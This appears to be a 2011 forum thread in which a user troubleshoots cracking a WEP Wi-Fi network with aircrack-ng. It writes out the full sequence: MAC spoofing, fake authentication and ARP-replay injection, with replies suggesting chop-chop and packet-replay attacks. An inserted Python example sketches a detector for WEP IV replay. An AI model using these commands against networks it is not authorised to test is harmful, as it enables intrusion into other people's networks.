Thread: wep problem

  1. #1
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    3

    wep problem

    Hello,
    I am currently trying to crack a wep connection with arp injection. I managed to get an arp message.
    Here are the commands I typed, in order:

    - ifconfig (to learn that my interface is called wlan0)
    - macchanger --mac 00:11:22:33:44:55 wlan0
    - airodump-ng wlan0 to learn that my targeted network has willy as essid, is on channel 11 and has for bssid aa:bb:cc:dd:ee:ff (it's not the true address but I modified it to simplify the reading of this post)
    - airmon-ng start wlan0 11
    - aireplay-ng -9 -e Willy -a aa:bb:cc:dd:ee:ff mon0
    I received "injection is working" and a 30/30 100%
    - airodump-ng -c 11 --bssid aa:bb:cc:dd:ee:ff -w output mon0
    Then in a second shell:
    - aireplay-ng -1 6000 -o 1 -q 10 -e Willy -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
    After a few lines I received "association successful" and then regularly:
    Sending keep Alive packet [ACK]
    I then open one last shell and type:
    - aireplay-ng -3 -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
    And I wait until I receive an arp packet.
    The problem is that, after I receive one, the sent packets keep increasing in the third and last shell, and I still receive acknowledgment packets in the second shell, but the #data column in the first shell still isn't increasing by much (around +1/minute only).
    How can that be?
    Don't hesitate to ask any further questions or ask me to do any tests (tcpdump...) that you feel relevant.
    Thanks.

  2. #2
    Member
    Join Date
    May 2011
    Location
    Israel
    Posts
    74

    Re: wep problem

    Make some traffic by pinging a non-existing host in order to gather more IV vectors. There is also an option to use other data frames and not only ARP packets. Sometimes you will be disassociated due to inactivity (reason 4).
    Some APs can fight off such attacks.
    Read Google Scholar; you will find many papers there describing the security and insecurity of 802.11.
    Learn and understand the theory of Wi-Fi.
    Scientia ac Labore

  3. #3
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    3

    Re: wep problem

    Hello,

    Thanks for the reply.
    How can I ping a host if I'm not inside the network?
    I don't think I am disassociated, I used the parameter -q 10 (I keep sending keep alive packets, and I receive ACKs).

  4. #4
    Just burned his ISO
    Join Date
    Jun 2011
    Location
    On The Earth
    Posts
    1

    Re: wep problem

    #DATA packets increase when someone is using that network. Try to attack at a time when you feel that someone is using that network.

  5. #5
    Member
    Join Date
    May 2011
    Location
    Israel
    Posts
    74

    Re: wep problem

    "How can I ping a host if I'm not inside the network"
    I thought that it is your network.
    "I don't think I am disassociated"
    Sometimes the AP will send a disassociation frame because of inactivity; it is implemented by some TP-LINK routers.
    Scientia ac Labore

  6. #6
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    3

    Re: wep problem

    iliyapolak,
    Yes it is my network, but I don't want to use the computers that are already connected to the network to help me crack the connection, otherwise there is no sense in trying to crack it in the first place.
    I don't think I am disassociated due to inactivity, since I'm sending aireplay-ng -1 6000 -q 10, thus regularly sending keep alive packets.

    internetspider,
    I would rather not wait that long, it would take forever. Instead I want to generate the necessary traffic with aireplay, with arp replay for example.

  7. #7
    Member
    Join Date
    May 2011
    Location
    Israel
    Posts
    74

    Re: wep problem

    "I would rather not wait that long, it would take forever. Instead I want to generate the necessary traffic with aireplay, with arp replay for example"
    Newer APs are less vulnerable to aircrack attacks even when WEP is switched on. Maybe some kind of custom replay protection is implemented.
    To completely answer your question, access to the AP source code or a disassembled binary is needed.
    Last edited by iliyapolak; 06-23-2011 at 06:25 AM.
    Scientia ac Labore
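
Added example, not part of the thread: WEP itself has no replay protection, so a check like the one post #7 speculates about has to be added by the AP or a wireless IDS. A sketch of such a detector, flagging a transmitter that resends the same WEP IV many times within a short window, run over constructed frame records (the record layout, MAC addresses, threshold and window are assumptions):

```python
from collections import defaultdict, deque

# Assumed tuning values for this sketch; calibrate against real traffic.
WINDOW_SECONDS = 1.0
REPEAT_THRESHOLD = 20


def wep_iv(frame_body: bytes) -> bytes:
    """Return the 3-byte IV that starts a WEP-protected frame body
    (IV[3] + key-id[1] + ciphertext + ICV[4])."""
    if len(frame_body) < 8:
        raise ValueError("too short to be a WEP-protected frame body")
    return frame_body[:3]


def find_replayers(frames, window=WINDOW_SECONDS, threshold=REPEAT_THRESHOLD):
    """frames: iterable of (timestamp, transmitter_mac, frame_body), time-ordered.
    Returns {transmitter_mac: set of IV hex strings} for transmitters that
    sent the same IV at least `threshold` times within `window` seconds."""
    recent = defaultdict(deque)   # (mac, iv) -> timestamps inside the window
    alerts = defaultdict(set)
    for ts, mac, body in frames:
        try:
            iv = wep_iv(body)
        except ValueError:
            continue              # malformed or non-WEP record: skip it
        seen = recent[(mac.lower(), iv)]
        seen.append(ts)
        while seen and ts - seen[0] > window:
            seen.popleft()
        if len(seen) >= threshold:
            alerts[mac.lower()].add(iv.hex())
    return dict(alerts)


def constructed_sample():
    """Constructed records: one station with fresh IVs, one resending a frame."""
    frames = []
    replayed = bytes.fromhex("a1b2c300") + b"\x55" * 64
    for i in range(40):
        t = i * 0.02
        normal = i.to_bytes(3, "big") + b"\x00" + b"\x11" * 64
        frames.append((t, "02:00:00:00:00:01", normal))
        frames.append((t + 0.001, "02:00:00:00:00:02", replayed))
    return frames


if __name__ == "__main__":
    print(find_replayers(constructed_sample()))
```

Link-layer retransmissions legitimately repeat an IV a few times, so the threshold should sit well above normal retry counts.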

  8. #8
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    19

    Re: wep problem

    Check that you're close enough, because you could be sending keepalives too quickly and you're dropping packets due to low signal. Also try other forms of attacks: chop-chop, standard attack, etc.

    Make sure you have the owner's permission, as this is against the law in some/most countries and you can be arrested for breaking into people's networks.

  9. #9
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Re: wep problem

    Why not troubleshoot like this:
    associate with bt5 without trying to send keep alive packets. -1 0 -e...
    start the arp replay
    ping from another computer to get one
    kill the arp attack
    remove the other computer, ensuring a clientless network
    reassociate with bt5
    use the packet replay attack with the saved arp packet: aireplay-ng -2 -r [saved packet from arp replay] [interface]
    if that doesn't work then you know there's an issue
    If this is unclear I can explain further.
